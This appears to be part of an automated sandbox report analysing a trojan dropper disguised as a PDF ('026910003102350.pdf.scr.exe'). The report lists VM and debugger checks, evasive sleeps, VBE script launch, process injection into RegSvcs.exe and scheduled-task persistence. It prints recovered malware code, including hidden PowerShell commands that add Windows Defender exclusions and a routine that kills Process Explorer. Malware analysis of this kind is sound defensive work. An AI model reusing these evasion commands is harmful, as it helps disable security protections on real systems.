Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXESUY;`D
Source: itugx.exe, 00000015.00000003.505153695.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000002.512758146.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506047618.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.508004868.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506688814.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506384568.0000000001356000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXES.

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5904	Thread sleep count: 64 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5904	Thread sleep count: 61 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 748	Thread sleep count: 52 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 748	Thread sleep count: 89 > 30	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1916	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 4028	Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 4028	Thread sleep count: 56 > 30
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 4136	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5916	Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5916	Thread sleep count: 96 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5460	Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5460	Thread sleep count: 83 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5596	Thread sleep count: 45 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5596	Thread sleep count: 82 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 1920	Thread sleep count: 64 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 1920	Thread sleep count: 55 > 30

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: threadDelayed 9667			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: foregroundWindowGot 455			Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

API coverage: 5.3 %

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VMwaretray.exe") Then#
Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then=
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") Thena46
Source: itugx.exe, 00000005.00000003.452233476.00000000014AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareUser.exe
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareUser.exe\Microso
Source: itugx.exe, 00000005.00000003.452233476.00000000014AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareService.exe65687
Source: wscript.exe, 00000001.00000002.363558819.0000000002F60000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: en-USenVMware.VMware.vmuiData\Local\Temp\Folder8_410\itugx.exe89
Source: wscript.exe, 0000000D.00000002.421779421.000001EDEF160000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: tBC:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------
Source: rnnsh.xls.0.dr	Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: itugx.exe, 00000015.00000003.509119527.0000000001299000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareService.exeipt.S
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: name="VMware.VMware.vmui"
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Thenj0
Source: itugx.exe, 00000010.00000003.468344244.0000000001412000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwaretray.exe^`DE$
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenk5q
Source: wscript.exe, 00000016.00000002.491522356.0000021FFC240000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------
Source: itugx.exe, 00000017.00000003.539485403.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwaretray.exe
Source: itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
Source: rnnsh.xls.0.dr	Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: wscript.exe, 00000001.00000003.361367465.00000000036F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware.VMware.vmuiData\Local\Temp\Folder8_410\itugx.exew
Source: itugx.exe, 00000015.00000003.509119527.0000000001299000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareUser.exe6BA444D6.
Source: itugx.exe, 00000010.00000003.469045500.00000000013AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareUser.exe3A765687
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareService.exe536C7
Source: itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwaretray.exeS
Source: itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: <description>"VMware Workstation"</description>
Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451315387.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452100532.0000000001510000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451193951.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451994345.000000000150D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462893753.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.468154413.000000000140E000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465422358.00000000013FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VBoxTray.exe
Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: itugx.exe, 00000005.00000003.451994345.000000000150D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwaretray.exen*
Source: wscript.exe, 0000001B.00000002.534995230.0000025B9C8D0000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------[
Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VboxService.exe
Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462582507.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") Then
Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwaretray.exe#
Source: rnnsh.xls.0.dr	Binary or memory string: If ProcessExists("VBoxTray.exe") Then

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CDE6A3 VirtualQuery,GetSystemInfo,

0_2_00CDE6A3

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00CCA69B
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00CDC220
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CEB348 FindFirstFileExA,	0_2_00CEB348
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0037E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0037E387
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0037D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0037D836
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0038A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0038A0FA
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0038A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_0038A488
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_003865F1 FindFirstFileW,FindNextFileW,FindClose,	2_2_003865F1
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0034C642 FindFirstFileExW,	2_2_0034C642
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00387248 FindFirstFileW,FindClose,	2_2_00387248
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_003872E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_003872E9
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0037DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0037DB69

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_00315D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

2_2_00315D78

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CE7DEE mov eax, dword ptr fs:[00000030h]		0_2_00CE7DEE
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00335078 mov eax, dword ptr fs:[00000030h]		2_2_00335078

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00CDF838

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CEC030 GetProcessHeap,

0_2_00CEC030

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0038F3FF BlockInput,

2_2_0038F3FF

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CDF9D5 SetUnhandledExceptionFilter,	0_2_00CDF9D5
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00CDF838
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CDFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00CDFBCA
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CE8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00CE8EBD
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00330D65 SetUnhandledExceptionFilter,	2_2_00330D65
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_003429B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_003429B2
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00330BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00330BCF
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00330FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00330FB1

HIPS / PFW / Operating System Protection Evasion

Starts an encoded Visual Basic Script (VBE)

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 11EE000			Jump to behavior

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0037BB02 SendInput,keybd_event,

2_2_0037BB02

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Contains functionality to query the security center for anti-virus and firewall products

Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: for $objantivirusproduct in $colitems
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $usb = $objantivirusproduct.displayname
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: next
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return $usb
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func disabler()
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;if antivirus() = "windows defender" then
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;#requireadmin
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;endif
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func antianalysis()
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if winexists("process explorer") then
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: winclose("process explorer")
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processclose("procexp64.exe")
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processclose("procexp.exe")
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6ecsz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: c:\windows\syswow64\wscript.exe\??\c:\windows\syswow64\wscript.exe;
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: 63209-405:en-usenwscript<
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: 23456789
